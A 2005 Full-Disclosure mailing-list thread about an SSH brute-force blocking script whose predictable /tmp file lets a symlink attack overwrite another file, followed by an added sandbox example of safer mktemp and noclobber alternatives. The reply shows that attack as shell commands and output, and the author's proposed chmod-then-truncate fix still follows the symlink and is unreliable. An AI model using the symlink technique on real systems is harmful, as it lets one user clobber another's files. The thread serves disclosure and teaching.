Ok, well spotted. Something for me to fix there.
Here you go, add these lines to the script just after the touch:

    chmod 700 ${TMP_FILE}
    > ${TMP_FILE}

My apologies, that is a no-no and something I should have spotted.

I originally thought about doing this with arrays in memory. I might go back to that later.

Thanks for your input.

Cheers, Mike.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alejandro Barrera
Sent: Friday, September 02, 2005 04:04 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] SSH Bruteforce blocking script

Well, we appreciate your script although I would prefer to stay with my nice bruteforcing attempts than to create an insecure temporary file bug:

[EMAIL PROTECTED]:~$ cat test.sh
#!/bin/sh
SCRIPT_NAME=$(basename $0)
TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
touch ${TMP_FILE}
echo "pwn3d" > ${TMP_FILE}
exit
[EMAIL PROTECTED]:~$ cat data
pr0n g0ld collection:
....
[EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18359
[EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18361
[EMAIL PROTECTED]:~$ ln -s /home/ergosum/data /tmp/test.sh.18362
[EMAIL PROTECTED]:~$ ./test.sh
[EMAIL PROTECTED]:~$ cat data
pwn3d

> #!/bin/ksh
> #
> # ssh_brute_blocker
> #
> # 05/07/2004 15:05 - Michael L. Benjamin
> #
> SCRIPT_NAME=$(basename $0)
> LOG_FILE="/var/log/secure"
> DENY_FILE="/etc/hosts.deny"
> TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
> INBOUND_IP=""
> INLINE=""
> GUESS_COUNT=0
> PERMIT_GUESS=4
> touch ${TMP_FILE}
> while :
> do
> tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" |
> awk -F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE}

--
Alejandro Barrera García-Orea
R&D Engineer
c/ Alcala 268
28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: [EMAIL PROTECTED]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
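
The temporary-file problem discussed in this thread, next to two ways of creating the file that do not follow a planted symlink. This is an added example, not part of the original messages or of ssh_brute_blocker; the function names, the "blocker.1234" file name and the sandbox layout are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. All names and paths here are constructed.

# Pattern from the thread: predictable name, then touch and ">".
# Both follow a symlink already sitting at that path.
write_predictable() {            # $1 = path, $2 = data
    touch "$1"
    echo "$2" > "$1"
}

# Hardened: mktemp picks an unpredictable name and creates the file itself
# with O_EXCL and mode 0600, so an existing file or symlink is never reused.
make_tmp() {                     # $1 = directory, $2 = prefix; prints the path
    mktemp "$1/$2.XXXXXXXXXX"
}

# Fixed name unavoidable? noclobber (set -C) makes ">" refuse any path that
# already exists, a planted symlink included.
write_exclusive() {              # $1 = path, $2 = data
    ( set -C; echo "$2" > "$1" ) 2>/dev/null
}

# Constructed scenario in a private sandbox: "shared" stands in for /tmp and
# "data" for another user's file reachable through a planted symlink.
# Prints the contents of data after each write style.
run_scenario() {
    box=$(mktemp -d) || return 1
    mkdir "$box/shared"
    echo "original" > "$box/data"

    ln -s "$box/data" "$box/shared/blocker.1234"     # guessed name
    write_predictable "$box/shared/blocker.1234" "clobbered"
    echo "predictable: $(cat "$box/data")"

    echo "original" > "$box/data"
    tmp=$(make_tmp "$box/shared" blocker) && echo "log lines" > "$tmp"
    echo "mktemp: $(cat "$box/data")"

    write_exclusive "$box/shared/blocker.1234" "clobbered" ||
        echo "noclobber: refused existing path"
    echo "noclobber: $(cat "$box/data")"
    rm -rf "$box"
}

run_scenario
```

On Linux, the fs.protected_symlinks sysctl also blocks following another user's symlink in a sticky world-writable directory, but a script should not depend on that setting being enabled.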